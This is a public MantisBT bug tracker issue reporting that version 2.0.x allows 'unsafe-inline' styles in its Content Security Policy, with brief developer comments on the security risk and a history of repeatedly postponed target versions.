View Issue Details

IDProjectCategoryView StatusLast Update
0021908mantisbtsecuritypublic2017-12-04 02:25
ReporteratrolAssigned To 
PrioritynormalSeverityminorReproducibilityalways
Status newResolutionopen 
Product Version 
Target Version2.10.0Fixed in Version 
Summary0021908: Weakened security headers in 2.0.x
Description

2.0.x comes with http_csp_add( 'style-src', "'unsafe-inline'" ); in http_api.php.
We don't allow unsafe-inline styles in 1.3.x.

Tagscsp

Activities

yanual

yanual

2017-11-06 05:56

reporter   ~0058143

Why you don't allow unsafe-inline styles in 1.3.x. ?

atrol

atrol

2017-11-06 06:03

developer   ~0058144

Why you don't allow unsafe-inline styles in 1.3.x. ?

Wrong question, it should be: Why you allow unsafe-inline styles in 2.x?

Allowing unsafe-inline styles decreases security.
That's why I reported the issue.

dregad

dregad

2017-11-06 06:40

developer   ~0058147

@yanual I suggested you read https://stackoverflow.com/a/31759553/1045774 for a brief explanation of the potential risks to your site when unsafe-inline styles are allowed.

yanual

yanual

2017-11-06 09:11

reporter   ~0058148

@atrol your formulation is indeed better.
Ok, I will wait patiently for postponement of the treatment of the issue.
@degrad i know these risks.

Issue History

Date Modified Username Field Change
2016-11-13 06:45 atrol New Issue
2016-11-14 06:20 atrol Tag Attached: csp
2016-11-27 08:20 dregad Target Version 2.0.0-rc.2 => 2.0.0
2016-12-30 15:56 vboctor Target Version 2.0.0 => 2.0.1
2017-02-01 22:49 vboctor Target Version 2.0.1 => 2.2.0
2017-02-26 21:19 vboctor Target Version 2.2.0 => 2.3.0
2017-04-01 00:20 vboctor Target Version 2.3.0 => 2.4.0
2017-04-30 14:53 vboctoradmin Target Version 2.4.0 => 2.5.0
2017-06-04 16:19 atrol Target Version 2.5.0 => 2.6.0
2017-09-03 18:49 vboctor Target Version 2.6.0 => 2.7.0
2017-10-08 23:55 vboctor Target Version 2.7.0 => 2.8.0
2017-10-28 19:14 vboctor Target Version 2.8.0 => 2.9.0
2017-11-06 05:56 yanual Note Added: 0058143
2017-11-06 06:03 atrol Note Added: 0058144
2017-11-06 06:40 dregad Note Added: 0058147
2017-11-06 09:11 yanual Note Added: 0058148
2017-12-04 02:25 vboctor Target Version 2.9.0 => 2.10.0